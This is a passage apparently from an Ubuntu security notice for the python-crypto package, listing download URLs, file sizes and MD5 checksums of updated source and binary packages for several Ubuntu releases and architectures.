http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2ubuntu1.1_amd64.deb
Size/MD5: 486454 ce89d8db64a1a8dee10db8cf18bb30a1
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2ubuntu1.1_amd64.deb
Size/MD5: 235488 c068f30cbe72009209c43e84063b1835
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2ubuntu1.1_i386.deb
Size/MD5: 447440 605251d220c5e9952a9d4cc8e9c75060
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2ubuntu1.1_i386.deb
Size/MD5: 223402 7e3908d6888e172cf2154298f3f8c9f2
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2ubuntu1.1_lpia.deb
Size/MD5: 443796 65776fb514a612b9a6e4a4aaa192fc5b
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2ubuntu1.1_lpia.deb
Size/MD5: 220388 8ae74844b825139bbd3e635c4488cb8b
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2ubuntu1.1_powerpc.deb
Size/MD5: 593560 33e015af10b7a351ee39f676e23653eb
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2ubuntu1.1_powerpc.deb
Size/MD5: 268382 ab1646b6dc87493c971dae32243bb242
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2ubuntu1.1_sparc.deb
Size/MD5: 461776 fc87dcebd27091b601e8ccf8e838e453
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2ubuntu1.1_sparc.deb
Size/MD5: 226284 da69ba865e86bc0447076f675d884cf5
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.1ubuntu1.1.diff.gz
Size/MD5: 11223 6365ecad8f9d716b7c068ab51dd93869
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.1ubuntu1.1.dsc
Size/MD5: 946 f9a5983f25d35bedcc72a2a5fdd052e3
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1.orig.tar.gz
Size/MD5: 158593 f81d94a506981c67188f08057d797420
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.1ubuntu1.1_amd64.deb
Size/MD5: 568060 aa46cf0d6adc7b0299debc303df435d1
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.1ubuntu1.1_amd64.deb
Size/MD5: 228736 e5543d872c3562e602408cdb39b03f63
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.1ubuntu1.1_i386.deb
Size/MD5: 514430 759b824c6389630b91b2da9e21a86a01
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.1ubuntu1.1_i386.deb
Size/MD5: 216922 b4eae87002c9c0a7f18abd9884004a49
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.1ubuntu1.1_lpia.deb
Size/MD5: 514468 bbf6e3cfa3fdfa1b0e2f89a03dd54ab8
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.1ubuntu1.1_lpia.deb
Size/MD5: 216380 1f5250946df65f9d44e9027d2b397152
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.1ubuntu1.1_powerpc.deb
Size/MD5: 676536 334c5ed43ad9cbf7a521045ddbeae7d8
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.1ubuntu1.1_powerpc.deb
Size/MD5: 258370 c70b751e7ef892ecbf0f5567b16719a0
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.1ubuntu1.1_sparc.deb
Size/MD5: 511630 ebfb3ca90c327363f19ececcba509a1f
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.1ubuntu1.1_sparc.deb
Size/MD5: 221378 d98e810a1204c8b83749f19f91210a7b
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.3ubuntu0.1.diff.gz
Size/MD5: 10354 37fb59b427446ceed5ed5a0800797e26
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.3ubuntu0.1.dsc
Size/MD5: 1424 41f352a397b85569bc23d0b85f194ed0
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1.orig.tar.gz
Size/MD5: 158593 f81d94a506981c67188f08057d797420
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.3ubuntu0.1_amd64.deb
Size/MD5: 552134 3857f8511956365a9c131c263d82b933
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.3ubuntu0.1_amd64.deb
Size/MD5: 227784 9349f0d14face27e266dfd4494d9e903
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.3ubuntu0.1_i386.deb
Size/MD5: 521518 0d33597259beac8b9b07cb5389b5bac3
http://security.ubuntu.com/ubuntu/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.3ubuntu0.1_i386.deb
Size/MD5: 221226 44f0cbc17dfefef5e250fc547464dd8b
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.3ubuntu0.1_lpia.deb
Size/MD5: 521772 3375c209c1628434943694b85496ab4f
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.3ubuntu0.1_lpia.deb
Size/MD5: 219324 612edcbece0f14f9903bc9e3b08790a3
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.3ubuntu0.1_powerpc.deb
Size/MD5: 682374 b4f032ad1611e4980a1caef7214b68f5
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.3ubuntu0.1_powerpc.deb
Size/MD5: 269794 1dce6263c85c8cab3c03a104782f1b86
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto-dbg_2.0.1+dfsg1-2.3ubuntu0.1_sparc.deb
Size/MD5: 512496 000f4c1d74291b6db92668a7c845c9b4
http://ports.ubuntu.com/pool/main/p/python-crypto/python-crypto_2.0.1+dfsg1-2.3ubuntu0.1_sparc.deb
Size/MD5: 223042 0b52a4785c733bc85ff28640781f4b4a